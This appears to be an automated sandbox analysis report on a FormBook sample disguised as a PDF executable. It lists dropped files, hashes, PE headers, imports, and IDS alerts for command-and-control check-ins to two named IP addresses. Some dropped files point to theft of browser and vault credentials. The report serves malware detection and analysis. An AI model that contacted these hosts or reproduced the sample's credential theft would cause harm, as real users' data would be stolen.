Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lxxqwri.2qj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a10rzeiw.wi0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avprntir.zqq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gg1v4u5h.mmf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4bjxsig.dqv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnjuhh3v.2it.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdivv3yg.yzh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teqsfm3t.doy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvp1tds4.2eq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y45rg5ob.cc2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv3ua2zx.fex.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\J8AR3449\J8Alogim.jpeg

Download File

Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	100481
Entropy (8bit):	7.87160521111376
Encrypted:	false
SSDEEP:	3072:y6RmiKrEoB22FlWW7PyCfbntZ4q4W0nwPLPx1VddWn7:yBnvo6BZJh1TnVdW7
MD5:	AA1FEC96FB1129A50ED74F413D436A72
SHA1:	EDB3C86039708636D81C4C5E8F10AB6D97E4DAEF
SHA-256:	39230D0325D1DAAEFCDF62E0F44F791469A761312C41D55F260DF3F8162B1712
SHA-512:	31ED3B9F28FEC708BFED0C9937355E077598BC632DCCAD7E4F9E59EA8265A27AA2B04644868681C1DA804ABBB14E8D43D7DC0FBF5BD04D4F5256008BFB79A79C
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(....~....[.....).....+.F"8x{I.t.p....pj.g.Ez..+..........O.Wz.......\..4;?...O.........QA..Z.DqCr.Y...L....V..\A.

C:\Users\user\AppData\Roaming\J8AR3449\J8Alogrg.ini

Download File

Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\J8AR3449\J8Alogri.ini

Download File

Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\J8AR3449\J8Alogrv.ini

Download File

Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.96096404744368
Encrypted:	false
SSDEEP:	3:AJlbeGQJhIl:tGQPY
MD5:	BA3B6BC807D4F76794C4B81B09BB9BA5
SHA1:	24CB89501F0212FF3095ECC0ABA97DD563718FB1
SHA-256:	6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
SHA-512:	ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.025214153664025
TrID:	Win64 Executable GUI Net Framework (217006/5) 45.39% Win64 Executable GUI (202006/5) 42.25% InstallShield setup (43055/19) 9.01% Win64 Executable (generic) (12005/4) 2.51% Generic Win/DOS Executable (2004/3) 0.42%
File name:	101 2043 5770 pdf.exe
File size:	2'148'960 bytes
MD5:	5e8e7dd95b3e592a44a3c61b7f8d91f8
SHA1:	d829b9e1e99087d94f527f359184f65b608190c5
SHA256:	8d278608d1d1c4c5b6c048020c23351e75203066af1ae1e63c5c5ac0170cd3de
SHA512:	a9846b798e89596da64cfeb844a5dcb3eefa983972cc4433cb6861464a386900a9035428187e5ae4e8b666a70df7c147f48884c512ee5823bcd1275072fc8d60
SSDEEP:	49152:tl2eQMj254Xra+qk6okjyjxKtyEAqVG13lwUWQdHt:76euw
TLSH:	F6A5BE14E3A801A8E867D738CA659333D67079524731E58F0A9DD6462F73E92AF7F302
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.:...TI..TI..TI..WH..TI..PH..TI..QH,.TI...I..TII.UH..TI..UI..TI..WH..TI..PH..TI..TI..TI..QHG.TIJ.TH..TIJ.VH..TI...............

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static PE Info

General

Entrypoint:	0x14006b460
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CE0C50 [Tue Aug 27 17:26:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	0a6d80c5b45dc9232fe72a993ca3e0d3

Authenticode Signature

Signature Valid:	false
Signature Issuer:	C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	29/08/2024 16:43:43 29/08/2025 16:43:43
Subject Chain	C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Version:	3
Thumbprint MD5:	11ED0D1EC81DD92A189525C45931F9EB
Thumbprint SHA-1:	F95A19E704C475FBD1080BCB4A857C1EF4DD50C0
Thumbprint SHA-256:	2FAA4F6CCD3BD61AAA0C50A81C9DB4590444FAFA2A87752257D6BBB2A3E14E4A
Serial:	59ED6E3CF8A78799FEF5C8B64E40D627

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F7C1514C8B8h
dec eax
add esp, 28h
jmp 00007F7C1514C0D7h
int3
int3
jmp 00007F7C1514CC34h
int3
int3
int3
dec eax
sub esp, 28h
call 00007F7C1514CC30h
jmp 00007F7C1514C264h
xor eax, eax
dec eax
add esp, 28h
ret
int3
int3
jmp 00007F7C1514C24Ch
int3
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F7C1514C272h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F7C1514C275h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F7C1514C26Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F7C1514C282h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x214650	0x5c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2146ac	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x238000	0x3485e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x226000	0x111b4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x20ac00	0x1e60	.rdata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x26d000	0x63c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1f2560	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1f2780	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1f2420	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x174000	0x6a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6fcb8	0x6fe00	4b2488f2c7fec6f481464b570ca5856a	False	0.4536378317039106	data	6.635918615899856	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed	0x71000	0xb07c8	0xb0800	8ec12955d427a1f500901981bc59a6b1	False	0.4581060220432011	data	6.445933561678563	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated	0x122000	0x51d20	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x174000	0xa1ef2	0xa2000	c751d0a7fbc06519a419b050191f800a	False	0.4818929036458333	data	6.7608400037217695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x216000	0xfbc8	0x1e00	53a772a36c0bdfcb72ac30a7628c92ee	False	0.23372395833333334	data	3.4353487191823837	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x226000	0x111b4	0x11200	1db7318b835b41fa344d9277ab8371a5	False	0.501995894160584	data	6.103707592779661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x238000	0x3485e	0x34a00	14477b4ab6efe5a4bea250c1065114f1	False	0.9363773010688836	data	7.890949698212121	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x26d000	0x63c	0x800	b3a557137fc09f07085825ae4cc5bbc7	False	0.4873046875	data	4.8006526994313745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
BINARY	0x238300	0x2e4a4	data	1.0003480939220692
RT_ICON	0x2667a4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	0.3077956989247312
RT_ICON	0x266a8c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	0.543918918918919
RT_ICON	0x266bb4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.5610341151385928
RT_ICON	0x267a5c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.6796028880866426
RT_ICON	0x268304	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.546242774566474
RT_ICON	0x26886c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4191908713692946
RT_ICON	0x26ae14	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4800656660412758
RT_ICON	0x26bebc	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.6099290780141844
RT_GROUP_ICON	0x26c324	0x76	data	0.6440677966101694
RT_VERSION	0x26c39c	0x2d8	data	0.42032967032967034
RT_MANIFEST	0x26c674	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
ADVAPI32.dll	RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumValueW
bcrypt.dll	BCryptCloseAlgorithmProvider, BCryptDestroyKey, BCryptGenerateSymmetricKey, BCryptOpenAlgorithmProvider, BCryptGenRandom
KERNEL32.dll	TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, GetConsoleWindow, FreeConsole, AllocConsole, SetLastError, GetLastError, LocalFree, CloseHandle, CreateProcessW, GetThreadContext, ExitProcess, GetTickCount64, FormatMessageW, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, GetCurrentProcess, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, RaiseFailFastException, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetCurrentThread, Sleep, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, InitializeCriticalSection, InitializeConditionVariable, WaitForMultipleObjectsEx, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, LocalAlloc, GetConsoleOutputCP, WideCharToMultiByte, GetProcAddress, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetThreadPriority, SetThreadPriority, WriteFile, GetCurrentProcessorNumberEx, SetEvent, CreateEventExW, GetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, ResumeThread, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlLookupFunctionEntry, InitializeSListHead
ole32.dll	CoUninitialize, CoInitializeEx, CoGetApartmentType, CoWaitForMultipleHandles
api-ms-win-crt-heap-l1-1-0.dll	free, _callnewh, _set_new_mode, malloc, calloc
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr, ceil
api-ms-win-crt-string-l1-1-0.dll	strcmp, strncpy_s, strcpy_s, _stricmp, wcsncmp
api-ms-win-crt-convert-l1-1-0.dll	strtoull
api-ms-win-crt-runtime-l1-1-0.dll	_c_exit, _register_thread_local_exe_atexit_callback, _exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _cexit, __p___wargv, __p___argc, abort, _seh_filter_exe, _set_app_type, exit, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _initterm, _initterm_e
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vfprintf, _set_fmode, __p__commode, __stdio_common_vsprintf_s, __stdio_common_vsscanf, __acrt_iob_func
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-30T07:27:45.059347+0200	TCP	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	49725	80	192.168.2.6	204.11.56.48
2024-08-30T07:27:45.059347+0200	TCP	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	49725	80	192.168.2.6	204.11.56.48
2024-08-30T07:27:45.059347+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	49725	80	192.168.2.6	204.11.56.48
2024-08-30T07:27:45.116755+0200	TCP	2829004	ETPRO MALWARE FormBook CnC Checkin (POST)	1	49726	80	192.168.2.6	204.11.56.48
2024-08-30T07:29:46.364729+0200	TCP	2829004	ETPRO MALWARE FormBook CnC Checkin (POST)	1	49730	80	192.168.2.6	3.33.130.190
2024-08-30T07:25:54.036660+0200	TCP	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	49729	80	192.168.2.6	3.33.130.190
2024-08-30T07:25:54.036660+0200	TCP	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	49729	80	192.168.2.6	3.33.130.190
2024-08-30T07:25:54.036660+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	49729	80	192.168.2.6	3.33.130.190

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 07:27:44.536178112 CEST	49725	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:44.541064978 CEST	80	49725	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:44.541136026 CEST	49725	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:44.541199923 CEST	49725	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:44.545945883 CEST	80	49725	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.052627087 CEST	49725	80	192.168.2.6	204.11.56.48
